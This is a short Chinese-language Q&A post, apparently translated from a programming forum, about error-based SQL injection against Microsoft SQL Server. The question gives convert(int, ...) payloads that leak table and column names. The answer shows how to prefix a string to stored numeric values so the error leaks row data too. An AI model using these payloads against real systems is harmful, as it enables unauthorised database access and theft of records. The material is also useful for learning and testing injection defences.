nvarchar 持有“整数”值 - 转换时不报告错误 - SQL 注入

Question

学习sql注入。我在我的网站上发现了一个 sql 注入。

我可以执行以下查询并检索表名和列名

表名：

convert(int,(select top 1 table_name from information_schema.tables))

列名：

convert(int,(select top 1 column_name from information_schema.columns where table_name='customer' and column name not in('id'))



> Table structure:
> 
> id nvarchar custid nvarchar

行：

id 监护人 --------- 1 1000 2 1001

我找到了表格的以下结构。

但现在我无法获取行中的值..

试过了：

convert(int,(select top 1 id from customer))--

在此查询中，它没有显示任何错误，我无法获取行值。

想法：

虽然“id”列类型是“nvarchar”，但它存储的是整数值，所以转换成int不会出错？？

在这种情况下如何获取行的值？？

Answer 1

您可以连接一个非数字字符串，例如convert(int,(select top 1 'id:' + id from customer))--

如果您要查找 int 字段中的内容，请将其转换为 varchar(10)，然后与非数字字符串连接。

但不要用它来作恶……